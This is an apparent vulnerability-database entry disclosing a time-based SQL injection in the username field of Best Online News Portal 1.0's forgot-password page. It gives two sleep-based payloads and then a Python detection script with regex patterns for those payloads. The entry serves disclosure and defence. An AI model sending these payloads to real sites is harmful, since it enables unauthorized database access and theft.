| Title | Best online news portal v1.0 /101news/admin/forgot-password.php POST parameter username SQL injection vulnerability |
|---|---|
| Description | An issue was discovered in Best online news portal v1.0. There is a SQL injection that can directly issue instructions to the backend database system via the POST parameter username of /101news/admin/forgot-password.php.<br>Payload1: `username=a' and (select 1 from (select(sleep(10)))a) AND 'a'='a&email=b&confirmpassword=c&newpassword=d&submit=`<br>Payload2: `username=a' and (select 1 from (select(sleep(15)))a) AND 'a'='a&email=b&confirmpassword=c&newpassword=d&submit=` |
| Source | https://github.com/PEOIzEve/bug_report/blob/main/SQLi-1.md |
| User | PEOIzEve (UID 44579) |
| Submission | 04/09/2023 09:27 (3 years ago) |
| Moderation | 04/09/2023 09:48 (20 minutes later) |
| Status | Accepted |
| VulDB entry | 225361 [SourceCodester Best Online News Portal 1.0 POST Parameter forgot-password.php Username sql injection] |
| Points | 20 |
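
A detection-side check for the request shape in the Description, as an added example (not part of the original submission or the project's code): it parses form-encoded POST bodies sent to forgot-password.php and flags a `username` value that breaks out of a string literal or calls a MySQL delay function, noting a slow response as corroboration. The function names, the 5-second threshold and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Path taken from the advisory; only this endpoint is inspected.
TARGET_PATH = "/101news/admin/forgot-password.php"
# MySQL functions that produce a measurable delay (time-based blind SQLi).
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# A quote followed by a boolean keyword, statement end or comment marker.
BREAKOUT = re.compile(r"['\"]\s*(?:(?:and|or|union)\b|;|--|#)", re.IGNORECASE)


def inspect_username(body):
    """Return the reasons a form-encoded body looks like time-based SQLi."""
    fields = parse_qs(body, keep_blank_values=True)  # also URL-decodes values
    reasons = []
    for value in fields.get("username", []):
        if BREAKOUT.search(value):
            reasons.append("quote breakout")
        if DELAY_CALL.search(value):
            reasons.append("delay function call")
    return reasons


def flag_requests(records, slow_seconds=5.0):
    """Yield (index, reasons) for suspicious POSTs to TARGET_PATH.

    records: iterable of (method, path, body, response_seconds). A slow
    response alone is never flagged; it only corroborates a payload match.
    """
    for i, (method, path, body, elapsed) in enumerate(records):
        if method != "POST" or path != TARGET_PATH:
            continue
        reasons = inspect_username(body)
        if reasons and elapsed >= slow_seconds:
            reasons.append(f"response took {elapsed:.1f}s")
        if reasons:
            yield i, reasons


# Constructed sample records (not real traffic).
SAMPLE = [
    ("POST", TARGET_PATH, "username=admin&email=a%40example.com&submit=", 0.2),
    ("POST", TARGET_PATH,
     "username=a' and (select 1 from (select(sleep(10)))a) AND 'a'='a"
     "&email=b&confirmpassword=c&newpassword=d&submit=", 10.3),
    ("POST", TARGET_PATH, "username=o'brien&email=b&submit=", 0.1),
    ("GET", "/101news/index.php", "", 0.1),
]
```

Pattern matching of this kind is a triage aid for logs or a WAF rule; the fix for the injection itself is to bind `username` as a query parameter rather than concatenating it into the SQL string.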